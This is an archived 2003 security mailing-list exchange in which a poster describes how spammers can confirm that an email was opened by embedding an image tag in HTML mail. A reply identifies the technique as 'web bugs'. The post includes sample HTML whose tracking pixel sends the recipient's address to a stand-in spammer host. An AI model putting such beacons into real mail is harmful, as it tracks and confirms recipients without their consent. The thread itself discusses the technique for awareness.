This technique is very common and has been used since the mid-90s.
Here's a bit more information about the use of "Web bugs" in email:
http://www.privacyfoundation.org/resources/webbug.asp
Richard
-----Original Message-----
From: Calderon, Juan C (CORP, DDEMESIS)
[mailto:Juan.Calderon@ddemesis.ge.com]
Sent: Tuesday, April 22, 2003 12:06 PM
To: webappsec@securityfocus.com
Subject: spam technique name?
Hello all
Recently I was thinking about a technique that could be used by
spammers; I don't know a common name or something for such a technique,
so if you know it please let me know.
PROBLEM
How can a spammer know if the victim opened the mail? One is
the well known "Remove Me" link which, in fact, will confirm the user read
the message (and probably will be bombed with many more, now that he
said "hey!, I'm here"). However, it requires user interaction.
SOLUTION
A simple "solution" can be to insert an Image, Link (for CSS for
example) or Script tag in the HTML mail; all those elements indicate to Web
browsers to send a GET request using the SRC or HREF attribute, without
user interaction.
Sample Code (Mail sent to fictitious peter@foomail.com)
<HTML>
<BODY>
Dear Peter
Buy our brand new product, CHEAP, CHEAP, CHEAP....
<img src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2Ecom'><br>
Click <a href='http://www.spamer.com/ConfirmVictim.php'>Here</a>
to be removed<br>
NOTE: the presence of this link indicates this is not spamming
even if you don't ask for this email
</BODY>
</HTML>
Viewing (or "previewing" in Outlook or similar) this email will
automatically send a request for a "image" file served by a Server-side
script, first recording the data without explicit authorization.
I've tested this (using 3 different tags) using Exchange and some other
public accounts. I have succeeded in all cases.
So have you seen something similar? Do you think this is a kind of XSS?
I do.
cheers :)
Juan C Calderon
IT Security
Received on Tue Apr 22 13:56:53 2003
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:50 EDT